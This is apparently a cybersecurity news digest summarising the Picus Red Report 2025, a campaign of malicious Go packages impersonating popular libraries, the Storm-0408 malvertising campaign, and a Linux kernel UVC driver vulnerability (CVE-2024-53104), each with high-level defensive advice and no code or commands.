The Red Report Summary for Busy IT Pros

March 08, 2025

The Red Report 2025 by Picus Labs analyzed 1 million malware samples and found that 93% of attacks leverage just 10 MITRE ATT&CK techniques—including process injection, password theft, and encrypted data exfiltration.

Key insights:
🔹 Credential theft surged 3x: password managers & browser-stored logins are prime targets.
🔹 Attackers stay hidden longer, using stealth techniques & encrypted channels.
🔹 Ransomware now focuses on double extortion, combining encryption & data leaks.
🔹 Proactive security is critical—MFA, behavior-based detection, and Zero Trust are must-haves.

We’ve distilled the 110-page report into a quick 7 min read for busy IT pros. Read the full summary here and get straight to the most important takeaways!

Security researchers have discovered a nefarious campaign targeting the Go programming ecosystem, deploying seven weaponized packages that install hidden malware on Linux and macOS systems.

These packages cleverly impersonate popular Go libraries, using advanced obfuscation to hide their malicious intent. Key Highlights include:

Targeting Developers: Specifically aims at UNIX-like environment developers.
Impersonation: Four packages mimic the hypert library and three the layout library.
Financial Focus: One variant targets financial-sector developers with deceptive domain names.
Execution Techniques: Malicious functions execute remote scripts from suspicious domains, with delays to avoid detection.

As malicious threats evolve, developers are encouraged to utilize real-time scanning tools, conduct thorough code audits, and verify package integrity. This unfolding campaign underscores the critical need for vigilance in software development and package management.

Microsoft has raised alarms about a massive malvertising campaign that has compromised over a million devices globally, part of a sophisticated attack by the Storm-0408 threat group.

This campaign points to a significant shift in tactics, using illegal streaming sites to embed malicious redirects that lead users to GitHub and other platforms. Key highlights include:

Targets: Both consumer and enterprise devices were affected, showcasing the campaign's indiscriminate nature.
Tactics Used: Attackers employed multi-stage processes, utilizing PowerShell, AutoIT scripts, and living-off-the-land binaries for more effective data exfiltration.
Initial Access: GitHub has been notably used as a staging ground for malicious payloads.
Financial Motives: There is evidence suggesting potential theft of sensitive financial data, particularly cryptocurrency.

As cybercriminals devise increasingly intricate schemes, vigilance remains critical for users and businesses alike!

A newly released proof-of-concept (PoC) exploit has highlighted a significant out-of-bounds write vulnerability in the Linux kernel, tagged as CVE-2024-53104. This flaw resides within the USB Video Class (UVC) driver and could lead to serious privilege escalation.

Key Highlights:

• Vulnerability due to improper parsing of UVC_VS_UNDEFINED frames.
• Exploitable via insertion of malicious USB devices or manipulation of video streams.
• Exploitation risks include system instability and arbitrary code execution.
• Impacting Linux kernel versions 2.6.26 and later, with a CVSS score of 7.8.

Google has already rolled out patches for affected systems, and the Cybersecurity and Infrastructure Security Agency (CISA) has added it to their KEV list, urging prompt updates.

For users, the recommendation is clear: secure your systems with the latest patches and consider enhancing USB device policies to fortify defenses against potential attacks.